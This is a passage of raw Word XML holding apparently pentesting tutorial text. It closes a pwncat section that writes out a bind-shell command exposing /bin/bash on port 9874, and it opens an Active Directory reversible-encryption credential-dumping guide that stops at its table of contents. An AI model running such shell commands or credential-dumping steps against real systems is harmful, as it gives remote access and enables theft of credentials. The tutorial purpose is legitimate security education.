      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l -e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-s0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="DD1144"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>'/bin/bash '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9874</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FC9F79" w14:textId="47560527"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noProof/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62F65363" wp14:editId="07C262D4">
            <wp:extent cx="5731510" cy="41846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18465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7ED114" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>It can be observed that the bind shell connection is obtained on the kali machine. Because of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-k </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>flag used above the bind shell will re-accept new clients as soon as a client has disconnected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B27CA39" w14:textId="438C6AD0"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noProof/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EE9E844" wp14:editId="399FD3C8">
            <wp:extent cx="5731510" cy="358584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585845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2085E45F" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>It can be noted that the above procedure is also satisfied while working with the UDP ports just by using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> flag after the command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B96C70F" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Advantages over </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="725F6D47" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, a feature-rich </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">-like tool designed for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pentesters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> and red teamers, offers several enhancements over traditional </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F02D09" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Interactive Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FC9002" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Scriptable Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452D591E" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Encrypted Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C0BD2B" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Persistance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="382622B1" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides an interactive shell with syntax highlighting and command completion, improving the user experience. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Pentesters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> can automate tasks using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Pwncat’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python scripting interface, allowing for greater flexibility and customization. It also supports encrypted communication channels, ensuring confidentiality when interacting with compromised systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CA3ECB" w14:textId="77777777" w:rsidR="00240D72" w:rsidRDefault="00240D72"/>
    <w:p w14:paraId="02767C64" w14:textId="386554D3" w:rsidR="00523D79" w:rsidRDefault="00523D79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pentesters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">/red teamers can use a lot of tools to get reverse shell/bind shell/ upload-download files/Local Port forwarding and many more. However, if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> is considered in regular practise it can prove to be a very valuable and time saving tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D10B755" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42AA8950" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB4443F" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Credential Dumping – Active Directory Reversible Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB3C9D6" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4252F36E" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>According to MITRE, an adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>AllowReversiblePasswordEncryption</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>property specifies whether reversible password encryption for an account is enabled or disabled. By default, this property is disabled (instead of storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software requires it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035190E4" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>MITRE TACTIC: Credential Dumping (ID: TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B302AB4" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>MITRE Technique Modify Authentication Process (T1556)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E33E38" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>MITRE SUB ID: Reversible Encryption (</w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>T1556.005</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D6BA70" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>In Domain Controller user account reversible encryption is enabled, which means the encrypted data can be reversed back to the user’s password. The password stored with a reversible encryption policy is not a hash since a function can be called to get back to the original clear-text password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BB618F" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Do you know?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349A82FE" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>As per </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Microsoft</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>: If you use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Challenge Handshake Authentication Protocol (CHAP)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> through remote access or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Authentication Services (IAS),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> you must enable this policy setting. CHAP is an authentication protocol that is used by remote access and network connections. Digest Authentication in Internet Information Services (IIS) also requires that you enable this policy setting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A00E29" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Table of Content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654C0419" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lab Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30461EAE" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>DC-Sync Attack-Dump Plain text Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D13CCC2" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA2F642" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CE1C44" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
